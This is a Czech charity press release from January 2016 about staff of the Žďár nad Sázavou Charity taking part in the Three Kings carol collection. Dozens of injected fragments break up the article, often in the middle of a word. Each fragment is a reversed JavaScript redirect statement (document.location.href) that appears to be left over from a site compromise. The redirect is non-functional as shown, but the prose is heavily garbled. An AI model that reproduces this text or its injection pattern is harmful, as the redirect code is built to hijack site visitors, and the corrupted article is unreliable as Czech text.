Rainbow page separator

I pracovníci žďárské Charity každoročně koledují

Středa, 13. ledna 2016

Závěr le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní Tříkrálové sbírky se postupně blíží. Ještě do 14. ledna je možné v ulicích potkat skupinky koledníků. Těch se při šestnácté sbírce zapojuje zhruba 1900 po celém žďárském okrese, kde působí Oblastní charita Žďár nad Sázavou.

„V průběhu sbírky došlo k navýšení počtu kasiček. Objevily se [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž další oblasti, kde se místní rozhodli do sbírky zapojit jako koledníci. Jde například o Prosetín, Čtyři Dvory a Brťoví. Celkový počet kasiček je v tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to chvíli 468,“ sdělila Veronika Dobrovolná, koordiná[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka Tříkrálové sbírky pro oblast Žďáru nad Sázavou.
Mezi koledníky nepatří pouze dobrovolníci, kteří jsou s Chari[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou v kontaktu při Tříkrálové sbírce, ale i charitní zaměstnanci. Většina z nich se pravidelně zapojuje ve svých již tradičně navštěvovaných lokalitách.
Každým rokem ve svátek Tří králů vyráží skupinka pracovníků na Městský úřad ve Žďáře nad Sázavou. Vedení města se jejich účastí rozhodlo zpestřit novoroční setkání pracovníků, při kterém le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos již podruhé zazněla tříkrálová koleda i za pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnosti velblouda Kamila.

Tříkrálová sbírka 2016 Žďár nad SázavouMěstský úřad v Bystřici nad Pernštejnem zažije návštěvu tříkrálových koledníků ve středu 13. 1. Tamější úředníky navštíví s tříkrálovou zdravicí uživatelé denního stacionáře Rosa společně s pracovníky. „Rozhodli jsme se do sbírky také zapojit, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože víme, že peníze podpoří služby ždárské Charity,“ sděluje Petra Königová, vedoucí bystřického denního stacionáře. Ten z loňského výtěžku pořídil pro převoz svých uživatelů devítimístný au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobil.

Ve Velkém Meziříčí se tříkrálové koledy účastní vedoucí denního stacionáře Nesa Alena Poulová. „S naší skupinkou navštěvujeme stejné domy, což vidím jako výhodu, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože za několik let si na naši návštěvu občané již zvykli a někteří nás již očekávají. Líbí se mi, že Tříkrálová sbírka není jenom o vybírání peněz, ale také že lidem popřejeme do nového roku. Obzvláště u některých starších lidí je znát, že mnoho návštěv k nim během Vánoc nepřijde a jsou vděčni, když jim děti zazpívají. Jako vedoucí jedné ze služeb vím, že vybrané peníze opravdu pomáhají,“ vysvětluje Alena Poulová a s úsměvem dodává: „Moji tři králové se vždy moc těší na starší paní, která bydlí sama v patře a má problémy s chůzí. Ta nám peníze posílá z okna v hrnečku na provázku.“
Již několik let dělá některým koledníkům doprovod věrný velbloud se služebním jménem Kamil. Každým rokem se pod jeho masku při tříkrálovém pu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování po městských úřadech schovává personalistka žďárské charity Renata Konečná.

„Kamil svojí pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomností předává radost, úsměv a pohlazení na duši. Není krásnější pohled na lidi než se dívat, jak se rozzáří při pohledu na našeho Kamila a v tu chvíli zapomenou na všední starosti a bolesti. Prostřednictvím Kamila, ale hlavně i díky třem králům, můžeme lidem poděkovat za jejich vstřícnost a netečnost vůči druhým lidem,“ popisuje Renata Konečná.

Do Tříkrálové sbírky se zapojuje i ředitelka Oblastní charity Žďár nad Sázavou Jana Zelená, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to především přípravou občerstvení pro novoměstské koledníčky: „Je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to taková drobná forma poděkování a zároveň povzbuzení pro koledníky. Přichází většinou ušlí a vymrzlí. Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to je fajn, když si mohou vypít teplý čaj, dát něco dobrého, posedět a předat si zkušenosti a zážitky.“
Důleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou činností, kterou vykonává vedoucí jednoho ze zařízení žďárské Charity Klubu v 9 Ivana Ptáčková společně s uživateli, je šití obleků pro koledníky. „Jsme rádi, že můžeme sbírku podpořit alespoň tak[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to,“ vysvětluje Ivana Ptáčková.

Do celostátní sbírkové kampaně se s kasičkou zapojuje i sama koordiná[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka Tříkrálové sbírky Veronika Dobrovolná. Nejen, že má na starosti celou organizaci od zapečetění kasiček až po sčítání výtěžku, ale zvládne i nasadit korunu a vyrazit do terénu s dětmi jako vedoucí skupinky.
Au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka tiskové zprávy: Lenka Šustrová

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: Archiv Charity (na fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografii mimo jiné i ředitelka Ing. Jana Zelená a bývalá koordiná[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torka Tříkrálové sbírky Michaela Kuch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová s dcerou Kateřinou)